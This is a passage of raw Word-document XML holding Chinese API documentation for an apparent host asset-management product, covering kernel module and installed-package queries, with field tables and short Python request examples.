          <w:p w14:paraId="1231B2CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17A5102F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="326A86E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0D09F444" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42E161BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B6F37AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54B79B2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22C8D116" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>模块大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="544F2E5E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51EC7BD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>depends</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7856D3B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36052F08" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FEA230A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>其依赖的模块进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2718BB16" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CB2B02D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>holders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E1D9AFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00CFEACD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="436F7CEF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>依赖其的内核模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7ACE0D43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>linux内核模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDFAE1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>def kernelmodule_linux():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/kernelmodule/linux?moduleName=ahci&amp;path=/lib/modules/4.8.</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>0-36-generic/kernel/drivers/ata/ahci.ko&amp;version=3.0,2.21,1.4" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'moduleName': 'ahci', 'path': '/lib/modules/4.8.0-36-generic/kernel/drivers/ata/ahci.ko', 'version': '3.0,2.21,1.4'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("GET", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1927623C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>对于签名的部分，有疑问可以参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="身份认证">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>身份认证</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:hyperlink w:anchor="请求签名">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>请求签名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>，对于完整的模拟请求参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="启动项信息查询结果">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>启动项信息查询结果</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>的windows代码示例(python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F04728" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="内核模块信息扫描"/>
      <w:bookmarkEnd w:id="69"/>
      <w:r>
        <w:t>内核模块信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE67538" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求内核模块信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162B94DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FA28D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/kernelmodule/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FCA78D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B4ACF4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185BF997" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B82CD88" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/kernelmodule/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04138C50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFA8B7C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C61D9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756AFCC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246F6775"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3858B4C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0E0CA58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ABF7FD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F973358" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36997636" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="483EE5A1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E1C3B37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C188FA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="354C28B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45C240DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FFC23B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:r>
        <w:t>linux内核模块信息扫描更新数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F1D460" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>def refresh():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/assets/kernelmodule/linux/refresh" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("POST", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366D64FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="内核模块信息查询扫描状态"/>
      <w:bookmarkEnd w:id="70"/>
      <w:r>
        <w:t>内核模块信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC7BFA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询内核模块信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130F8A83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="安装包信息"/>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkEnd w:id="71"/>
      <w:r>
        <w:t>安装包信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56418334" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5343E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于查询资产中的安装包信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57609882" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC797C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>安装包信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1716A45B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAC0296" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC11EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62789E57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.安装包信息查询结果</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2.安装包信息扫描</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>3.安装包信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485F695D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F59F4FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用安装包信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091896CF"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0F5E3135" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9285F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="安装包信息查询结果"/>
      <w:r>
        <w:t>安装包信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2A01B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询安装包信息，按每台主机每个安装包进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F962D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14812301" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/assets/pkg/{win|linux}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39288B25"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671"/>
        <w:gridCol w:w="1279"/>
        <w:gridCol w:w="442"/>
        <w:gridCol w:w="6690"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1D0E132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36EE39B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="301E90FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FAD3864" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53591F2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D2C5B8D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4001D181" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20CF11E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42EE0B01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41290186" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="45B57930" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09C12351" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51748DE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F74A896" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3974823F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="16C82D9C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DF6F928" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66C161C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23CFE402" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="796AF1B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="709FBE2D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="188A86A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="155B7082" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FF7F088" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15D39249" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="04302219" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B4FC560" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E53C59E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
